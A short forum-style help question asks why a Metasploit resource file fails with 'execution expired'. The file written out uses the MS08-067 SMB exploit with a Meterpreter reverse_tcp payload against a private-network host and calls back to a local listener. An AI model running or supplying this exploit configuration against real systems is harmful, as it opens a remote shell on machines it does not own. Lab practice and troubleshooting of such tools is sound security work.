Exploit exception: execution expired

I wrote a resource file that says:

use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.5.157
set LHOST 192.168.5.28
exploit

When I run it like so:
msf>msfconsole -r ms09-067.rc

I get the error:

[*] Started reverse handler on 192.168.5.28:4444 
[-] Exploit exception: execution expired


Can anyone tell me what this error means and what I've f'ed up here?
